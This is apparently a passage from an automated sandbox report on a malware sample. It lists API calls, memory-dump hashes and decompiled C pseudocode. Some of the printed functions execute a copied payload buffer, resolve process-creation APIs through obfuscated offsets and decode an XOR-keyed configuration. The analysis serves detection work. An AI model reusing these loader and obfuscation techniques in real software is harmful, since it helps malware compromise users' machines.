                  • lstrcat.KERNEL32(00000000,?), ref: 00DC3EC2
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00DC3EC8
                    • Part of subcall function 00DC745D: lstrlen.KERNEL32(?,00DCD2E0,74B47FC0,00000000,00DC534B,?,?,?,?,?,00DC70B5,?), ref: 00DC7466
                    • Part of subcall function 00DC745D: mbstowcs.NTDLL ref: 00DC748D
                    • Part of subcall function 00DC745D: memset.NTDLL ref: 00DC749F
                  • wcstombs.NTDLL ref: 00DC3F5B
                    • Part of subcall function 00DC492B: SysAllocString.OLEAUT32(00000000), ref: 00DC496C
                    • Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D
                  • HeapFree.KERNEL32(00000000,?,00000000), ref: 00DC3F9C
                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DC3FAC
                  • HeapFree.KERNEL32(00000000,00000000,?,05119630), ref: 00DC3FBC
                  • HeapFree.KERNEL32(00000000,?), ref: 00DC3FCC
                  • HeapFree.KERNEL32(00000000,?), ref: 00DC3FDA
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                  • String ID:
                  • API String ID: 972889839-0
                  • Opcode ID: 21a3913c6a444d72c22e890f096181bf00a04958e437219562beb6109164e6e6
                  • Instruction ID: 5e940f653c095a79a9d2f0ee5487d17983143718a47eaf81a711d1cb045b3b83
                  • Opcode Fuzzy Hash: 21a3913c6a444d72c22e890f096181bf00a04958e437219562beb6109164e6e6
                  • Instruction Fuzzy Hash: A9A1F77191020BAFCB119F68DC89FAA7BB9FF49354B184429F909C7260DB31D951DBB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$Info
                  • String ID: 0*p
                  • API String ID: 2509303402-2831513755
                  • Opcode ID: fec43e712b177bbe5e42bb60310420ac3fd91d8988f5f96bcf7a7bab9112043d
                  • Instruction ID: 531293be9d837879ee36bd5aa1cbc2ddb772c7262a094d8cd93b53f572aa5ab5
                  • Opcode Fuzzy Hash: fec43e712b177bbe5e42bb60310420ac3fd91d8988f5f96bcf7a7bab9112043d
                  • Instruction Fuzzy Hash: 8ED1ADB2D04306AFDB11CF68C881BAEBBB9BF48300F104569F996A7251DF74A855CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 702A2E84
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A36FE
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3710
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3722
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3734
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3746
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3758
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A376A
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A377C
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A378E
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37A0
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37B2
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37C4
                    • Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37D6
                  • _free.LIBCMT ref: 702A2E79
                    • Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
                    • Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7
                  • _free.LIBCMT ref: 702A2E9B
                  • _free.LIBCMT ref: 702A2EB0
                  • _free.LIBCMT ref: 702A2EBB
                  • _free.LIBCMT ref: 702A2EDD
                  • _free.LIBCMT ref: 702A2EF0
                  • _free.LIBCMT ref: 702A2EFE
                  • _free.LIBCMT ref: 702A2F09
                  • _free.LIBCMT ref: 702A2F41
                  • _free.LIBCMT ref: 702A2F48
                  • _free.LIBCMT ref: 702A2F65
                  • _free.LIBCMT ref: 702A2F7D
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: 725265803d70ce9de7f9ccaa37fb718376295833dc3174951b05eaf8910300b2
                  • Instruction ID: 0a6ee0f0851a085b1535d80406234a9e46915580c517e701e31cc6f0310d373a
                  • Opcode Fuzzy Hash: 725265803d70ce9de7f9ccaa37fb718376295833dc3174951b05eaf8910300b2
                  • Instruction Fuzzy Hash: 24312F736046029FEB229E7CD945B4E73F9AF40310F206819F95AE6160DF71F8A48F29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsInExceptionSpec.LIBVCRUNTIME ref: 70296763
                  • type_info::operator==.LIBVCRUNTIME ref: 7029678A
                  • ___TypeMatch.LIBVCRUNTIME ref: 70296896
                  • CatchIt.LIBVCRUNTIME ref: 702968EB
                  • IsInExceptionSpec.LIBVCRUNTIME ref: 70296971
                  • _UnwindNestedFrames.LIBCMT ref: 702969F8
                  • CallUnexpected.LIBVCRUNTIME ref: 70296A13
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                  • String ID: csm$csm$csm
                  • API String ID: 4234981820-393685449
                  • Opcode ID: be6524b8b20bfc424c502ecf97171aeeece15ffd2f624ce43f944caf998e50be
                  • Instruction ID: 70ea993fb40c5041ddd289e08ca4dbd288c0fc197d688d6e677c58a0045537bf
                  • Opcode Fuzzy Hash: be6524b8b20bfc424c502ecf97171aeeece15ffd2f624ce43f944caf998e50be
                  • Instruction Fuzzy Hash: 2CC14B7292020A9FDF06CF94C889A9EBBF5BF04314F104159E8567B211D731EA61CF9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 61%
                  			E00DC7E3F(void* __eax, void* __ecx) {
                  				long _v8;
                  				void* _v12;
                  				void* _v16;
                  				void* _v28;
                  				long _v32;
                  				void _v104;
                  				char _v108;
                  				long _t39;
                  				intOrPtr _t42;
                  				intOrPtr _t49;
                  				void* _t51;
                  				intOrPtr _t52;
                  				void* _t60;
                  				intOrPtr* _t65;
                  				intOrPtr _t69;
                  				intOrPtr* _t71;
                  				intOrPtr* _t74;
                  
                  				_t1 = __eax + 0x14; // 0x74183966
                  				_t69 =  *_t1;
                  				_t39 = E00DC40AF(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16);
                  				_v8 = _t39;
                  				if(_t39 != 0) {
                  					L12:
                  					return _v8;
                  				}
                  				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
                  				_t42 = _v12(_v12);
                  				_v8 = _t42;
                  				if(_t42 == 0 && ( *0xdcd218 & 0x00000001) != 0) {
                  					_v32 = 0;
                  					asm("stosd");
                  					asm("stosd");
                  					asm("stosd");
                  					_v108 = 0;
                  					memset( &_v104, 0, 0x40);
                  					_t49 =  *0xdcd230; // 0x434a5a8
                  					_t18 = _t49 + 0xdce55b; // 0x73797325
                  					_t51 = E00DCA590(_t18);
                  					_v12 = _t51;
                  					if(_t51 == 0) {
                  						_v8 = 8;
                  					} else {
                  						_t52 =  *0xdcd230; // 0x434a5a8
                  						_t20 = _t52 + 0xdce73d; // 0x5118ce5
                  						_t21 = _t52 + 0xdce0af; // 0x4e52454b
                  						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                  						if(_t65 == 0) {
                  							_v8 = 0x7f;
                  						} else {
                  							_t71 = __imp__;
                  							_v108 = 0x44;
                  							 *_t71(0);
                  							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                  							 *_t71(1);
                  							if(_t60 == 0) {
                  								_v8 = GetLastError();
                  							} else {
                  								CloseHandle(_v28);
                  								CloseHandle(_v32);
                  							}
                  						}
                  						HeapFree( *0xdcd1f0, 0, _v12);
                  					}
                  				}
                  				_t74 = _v16;
                  				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
                  				E00DC4C31(_t74);
                  				goto L12;
                  			}

                  APIs
                    • Part of subcall function 00DC40AF: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DC7E5B,?,?,?,?,00000000,00000000), ref: 00DC40D4
                    • Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DC40F6
                    • Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DC410C
                    • Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DC4122
                    • Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DC4138
                    • Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DC414E
                  • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00DC7E71
                  • memset.NTDLL ref: 00DC7EAC
                    • Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00DC3592,73797325), ref: 00DCA5A1
                    • Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DCA5BB
                  • GetModuleHandleA.KERNEL32(4E52454B,05118CE5,73797325), ref: 00DC7EE3
                  • GetProcAddress.KERNEL32(00000000), ref: 00DC7EEA
                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DC7F04
                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DC7F22
                  • CloseHandle.KERNEL32(00000000), ref: 00DC7F31
                  • CloseHandle.KERNEL32(?), ref: 00DC7F36
                  • GetLastError.KERNEL32 ref: 00DC7F3A
                  • HeapFree.KERNEL32(00000000,?), ref: 00DC7F56
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemcpymemset
                  • String ID:
                  • API String ID: 1222765985-0
                  • Opcode ID: 72ae4e2db4d3fdfacb6070d2c8cd74f969b5562734c226995bdb7b3d0ae18053
                  • Instruction ID: 48acf63f0414106d726768cb56508eb3eb40e66e04470a135b7e94ebc4e7d38e
                  • Opcode Fuzzy Hash: 72ae4e2db4d3fdfacb6070d2c8cd74f969b5562734c226995bdb7b3d0ae18053
                  • Instruction Fuzzy Hash: 2F411A7290521AFBCB119BA4DC88E9EBFB9EF08344F144469E205E7221D7719A45DBB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E00DC7D0C(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				char _v16;
                  				signed int _v20;
                  				void* __esi;
                  				intOrPtr _t42;
                  				intOrPtr _t44;
                  				void* _t46;
                  				void* _t47;
                  				void* _t48;
                  				int _t49;
                  				intOrPtr _t53;
                  				WCHAR* _t56;
                  				void* _t57;
                  				int _t58;
                  				intOrPtr _t64;
                  				void* _t69;
                  				intOrPtr* _t73;
                  				void* _t74;
                  				intOrPtr _t75;
                  				intOrPtr _t79;
                  				intOrPtr* _t85;
                  				intOrPtr _t88;
                  
                  				_t74 = __ecx;
                  				_t79 =  *0xdcd2ec; // 0x5119c48
                  				_v20 = 8;
                  				_v16 = GetTickCount();
                  				_t42 = E00DC2FF4(_t74,  &_v16);
                  				_v12 = _t42;
                  				if(_t42 == 0) {
                  					_v12 = 0xdcc1cc;
                  				}
                  				_t44 = E00DC4D59(_t79);
                  				_v8 = _t44;
                  				if(_t44 != 0) {
                  					_t85 = __imp__;
                  					_t46 =  *_t85(_v12, _t69);
                  					_t47 =  *_t85(_v8);
                  					_t48 =  *_t85(_a4);
                  					_t49 = lstrlenW(_a8);
                  					_t53 = E00DC75C4(lstrlenW(0xdcead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xdcead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                  					_v16 = _t53;
                  					if(_t53 != 0) {
                  						_t75 =  *0xdcd230; // 0x434a5a8
                  						_t73 =  *0xdcd11c; // 0xdcaac2
                  						_t18 = _t75 + 0xdcead8; // 0x530025
                  						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                  						_t56 =  *_t85(_v8);
                  						_a8 = _t56;
                  						_t57 =  *_t85(_a4);
                  						_t58 = lstrlenW(_a12);
                  						_t88 = E00DC75C4(lstrlenW(0xdcebf8) + _a8 + _t57 + _t58 + lstrlenW(0xdcebf8) + _a8 + _t57 + _t58 + 2);
                  						if(_t88 == 0) {
                  							E00DC4C31(_v16);
                  						} else {
                  							_t64 =  *0xdcd230; // 0x434a5a8
                  							_t31 = _t64 + 0xdcebf8; // 0x73006d
                  							 *_t73(_t88, _t31, _a4, _v8, _a12);
                  							 *_a16 = _v16;
                  							_v20 = _v20 & 0x00000000;
                  							 *_a20 = _t88;
                  						}
                  					}
                  					E00DC4C31(_v8);
                  				}
                  				return _v20;
                  			}

                  APIs
                  • GetTickCount.KERNEL32 ref: 00DC7D21
                  • lstrlen.KERNEL32(00000000,80000002), ref: 00DC7D5C
                  • lstrlen.KERNEL32(?), ref: 00DC7D65
                  • lstrlen.KERNEL32(00000000), ref: 00DC7D6C
                  • lstrlenW.KERNEL32(80000002), ref: 00DC7D7A
                  • lstrlenW.KERNEL32(00DCEAD8), ref: 00DC7D83
                  • lstrlen.KERNEL32(?), ref: 00DC7DC7
                  • lstrlen.KERNEL32(?), ref: 00DC7DCF
                  • lstrlenW.KERNEL32(?), ref: 00DC7DDA
                  • lstrlenW.KERNEL32(00DCEBF8), ref: 00DC7DE3
                    • Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrlen$CountFreeHeapTick
                  • String ID:
                  • API String ID: 2535036572-0
                  • Opcode ID: ddceeae3e1078a2148a290ce98dea91563b7b50d9a2999e270bad96d4288ca91
                  • Instruction ID: de3f45e41f40d1a5bf6a15284a6c10e6f72f72134d069637e01dd4495bf46a6b
                  • Opcode Fuzzy Hash: ddceeae3e1078a2148a290ce98dea91563b7b50d9a2999e270bad96d4288ca91
                  • Instruction Fuzzy Hash: AC313A7690021BEFCF01AFA4CC45E9EBBB5FF48314B0540A9F914A7221DB359A15EFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 423c60139bd66d4d713d67ed1c2370bf00428eb673624f5775bd2fcac4df0144
                  • Instruction ID: d8d9b2fb19e77f8830e1fdf5dd1d77ffa605724b9a30c7f430ce9bfc0daa9014
                  • Opcode Fuzzy Hash: 423c60139bd66d4d713d67ed1c2370bf00428eb673624f5775bd2fcac4df0144
                  • Instruction Fuzzy Hash: 6921C677950108AFCB01EFA8C881EDE7BB9BF48240F5055A6F615AB130DB31EA64CF85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 845483eb680f3f87fa88fa152ca8004ecc9cbb33d16b4ee1516f88cca73e72ea
                  • Instruction ID: 8a5a6c2eabb46a5b465be814a18a141f521d151dda7af361c8a755898f3a154e
                  • Opcode Fuzzy Hash: 845483eb680f3f87fa88fa152ca8004ecc9cbb33d16b4ee1516f88cca73e72ea
                  • Instruction Fuzzy Hash: 8361A8B3914705EFD711CF68C881B9EB7F9AB84720F20456AF956AB290EF70A9108F50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  • _free.LIBCMT ref: 7029EF1F
                  • _free.LIBCMT ref: 7029EF38
                  • _free.LIBCMT ref: 7029EF76
                  • _free.LIBCMT ref: 7029EF7F
                  • _free.LIBCMT ref: 7029EF8B
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$ErrorLast
                  • String ID: C
                  • API String ID: 3291180501-1037565863
                  • Opcode ID: 75e47d628c16c74756be2c07cb3859312018ad52e27fb237068dbb8c434aa4da
                  • Instruction ID: c6e4928e7991fceffb451a2a6e9085c217e3ee6a6ce122f6618b1d9290542ebe
                  • Opcode Fuzzy Hash: 75e47d628c16c74756be2c07cb3859312018ad52e27fb237068dbb8c434aa4da
                  • Instruction Fuzzy Hash: 2BB13B7691521AAFDB25DF18C884B9DB7B5FF48314F2045EAE84AA7350D730AEA0CF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 64%
                  			E00DC140D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _t9;
                  				intOrPtr _t13;
                  				char* _t28;
                  				void* _t33;
                  				void* _t34;
                  				char* _t36;
                  				intOrPtr* _t40;
                  				char* _t41;
                  				char* _t42;
                  				char* _t43;
                  
                  				_t34 = __edx;
                  				_push(__ecx);
                  				_t9 =  *0xdcd230; // 0x434a5a8
                  				_t1 = _t9 + 0xdce61b; // 0x253d7325
                  				_t36 = 0;
                  				_t28 = E00DC5680(__ecx, _t1);
                  				if(_t28 != 0) {
                  					_t40 = __imp__;
                  					_t13 =  *_t40(_t28);
                  					_v8 = _t13;
                  					_t6 =  *_t40(_a4) + 1; // 0x5119631
                  					_t41 = E00DC75C4(_v8 + _t6);
                  					if(_t41 != 0) {
                  						strcpy(_t41, _t28);
                  						_pop(_t33);
                  						__imp__(_t41, _a4);
                  						_t36 = E00DCA7A2(_t34, _t41, _a8);
                  						E00DC4C31(_t41);
                  						_t42 = E00DC8668(StrTrimA(_t36, "="), _t36);
                  						if(_t42 != 0) {
                  							E00DC4C31(_t36);
                  							_t36 = _t42;
                  						}
                  						_t43 = E00DC71BA(_t36, _t33);
                  						if(_t43 != 0) {
                  							E00DC4C31(_t36);
                  							_t36 = _t43;
                  						}
                  					}
                  					E00DC4C31(_t28);
                  				}
                  				return _t36;
                  			}


                  APIs
                    • Part of subcall function 00DC5680: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DC1427,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79), ref: 00DC56E7
                    • Part of subcall function 00DC5680: sprintf.NTDLL ref: 00DC5708
                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1438
                  • lstrlen.KERNEL32(00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1440
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                  • strcpy.NTDLL ref: 00DC1457
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00DC1462
                    • Part of subcall function 00DCA7A2: lstrlen.KERNEL32(00000000,00000000,00DC6C79,00DC6C79,00000001,00000000,00000000,?,00DC1471,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DCA7B9
                    • Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D
                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DC147F
                    • Part of subcall function 00DC8668: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00DC148B,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC8672
                    • Part of subcall function 00DC8668: _snprintf.NTDLL ref: 00DC86D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                  • String ID: =
                  • API String ID: 2864389247-1428090586
                  • Opcode ID: a6a110a8516a0c8addfbb4b38aa62b8fd6cbbbe0fb950af64b446d77aac323cd
                  • Instruction ID: 687522125e117e6919fd60169c341f5acc60cbdda2bce680d7d1861a70bbbd05
                  • Opcode Fuzzy Hash: a6a110a8516a0c8addfbb4b38aa62b8fd6cbbbe0fb950af64b446d77aac323cd
                  • Instruction Fuzzy Hash: CC11A37390162B7B4B126BB49C95EAF76ADDE45760319401DF904E7212DE34CD0297F4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 702A3E0E: _free.LIBCMT ref: 702A3E33
                  • _free.LIBCMT ref: 702A4110
                    • Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
                    • Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7
                  • _free.LIBCMT ref: 702A411B
                  • _free.LIBCMT ref: 702A4126
                  • _free.LIBCMT ref: 702A417A
                  • _free.LIBCMT ref: 702A4185
                  • _free.LIBCMT ref: 702A4190
                  • _free.LIBCMT ref: 702A419B
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 1ffe04ccff681ada3d54081bbd60d47f136a62837b1005a29c952738c47488dc
                  • Instruction ID: cd487928bcd06d6d4cb831093ed7e87dd547277df6137790fd5508d6a0b61bc9
                  • Opcode Fuzzy Hash: 1ffe04ccff681ada3d54081bbd60d47f136a62837b1005a29c952738c47488dc
                  • Instruction Fuzzy Hash: 451181B3584B04AED621ABB1DD07FCF7B9C5F81700F401825BA9AA6060DF74F5248FA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 702A597E
                  • __fassign.LIBCMT ref: 702A5B5D
                  • __fassign.LIBCMT ref: 702A5B7A
                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 702A5BC2
                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 702A5C02
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 702A5CAE
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: FileWrite__fassign$ConsoleErrorLast
                  • String ID:
                  • API String ID: 4031098158-0
                  • Opcode ID: 1d33067ae97979da6a929c1dcbdf6e5f33510b9c75bd3dded1351bcb088efd2b
                  • Instruction ID: a060665560fef8f29725a685e79e49e3478eafb3472eefd846c7dae622d5ba05
                  • Opcode Fuzzy Hash: 1d33067ae97979da6a929c1dcbdf6e5f33510b9c75bd3dded1351bcb088efd2b
                  • Instruction Fuzzy Hash: D7D191B6D012699FCB01CFE4C980ADEBBB6BF49314F24015AE856B7245DA30AD16CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00DC58CA(int* __ecx) {
                  				int _v8;
                  				void* _v12;
                  				void* __esi;
                  				signed int _t20;
                  				signed int _t25;
                  				char* _t31;
                  				char* _t32;
                  				char* _t33;
                  				char* _t34;
                  				char* _t35;
                  				void* _t36;
                  				void* _t37;
                  				intOrPtr _t38;
                  				signed int _t44;
                  				void* _t46;
                  				void* _t47;
                  				signed int _t49;
                  				signed int _t53;
                  				signed int _t57;
                  				signed int _t61;
                  				signed int _t65;
                  				signed int _t69;
                  				void* _t74;
                  				intOrPtr _t90;
                  
                  				_t75 = __ecx;
                  				_t20 =  *0xdcd22c; // 0x63699bc3
                  				if(E00DC33AC( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                  					 *0xdcd280 = _v12;
                  				}
                  				_t25 =  *0xdcd22c; // 0x63699bc3
                  				if(E00DC33AC( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                  					_push(2);
                  					_pop(0);
                  					goto L48;
                  				} else {
                  					_t74 = _v12;
                  					if(_t74 == 0) {
                  						_t31 = 0;
                  					} else {
                  						_t69 =  *0xdcd22c; // 0x63699bc3
                  						_t31 = E00DC1273(_t75, _t74, _t69 ^ 0x724e87bc);
                  					}
                  					if(_t31 != 0) {
                  						_t75 =  &_v8;
                  						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                  							 *0xdcd1f8 = _v8;
                  						}
                  					}
                  					if(_t74 == 0) {
                  						_t32 = 0;
                  					} else {
                  						_t65 =  *0xdcd22c; // 0x63699bc3
                  						_t32 = E00DC1273(_t75, _t74, _t65 ^ 0x2b40cc40);
                  					}
                  					if(_t32 != 0) {
                  						_t75 =  &_v8;
                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                  							 *0xdcd1fc = _v8;
                  						}
                  					}
                  					if(_t74 == 0) {
                  						_t33 = 0;
                  					} else {
                  						_t61 =  *0xdcd22c; // 0x63699bc3
                  						_t33 = E00DC1273(_t75, _t74, _t61 ^ 0x3b27c2e6);
                  					}
                  					if(_t33 != 0) {
                  						_t75 =  &_v8;
                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                  							 *0xdcd200 = _v8;
                  						}
                  					}
                  					if(_t74 == 0) {
                  						_t34 = 0;
                  					} else {
                  						_t57 =  *0xdcd22c; // 0x63699bc3
                  						_t34 = E00DC1273(_t75, _t74, _t57 ^ 0x0602e249);
                  					}
                  					if(_t34 != 0) {
                  						_t75 =  &_v8;
                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                  							 *0xdcd004 = _v8;
                  						}
                  					}
                  					if(_t74 == 0) {
                  						_t35 = 0;
                  					} else {
                  						_t53 =  *0xdcd22c; // 0x63699bc3
                  						_t35 = E00DC1273(_t75, _t74, _t53 ^ 0x3603764c);
                  					}
                  					if(_t35 != 0) {
                  						_t75 =  &_v8;
                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                  							 *0xdcd02c = _v8;
                  						}
                  					}
                  					if(_t74 == 0) {
                  						_t36 = 0;
                  					} else {
                  						_t49 =  *0xdcd22c; // 0x63699bc3
                  						_t36 = E00DC1273(_t75, _t74, _t49 ^ 0x2cc1f2fd);
                  					}
                  					if(_t36 != 0) {
                  						_push(_t36);
                  						_t46 = 0x10;
                  						_t47 = E00DC73B3(_t46);
                  						if(_t47 != 0) {
                  							_push(_t47);
                  							E00DC10E4();
                  						}
                  					}
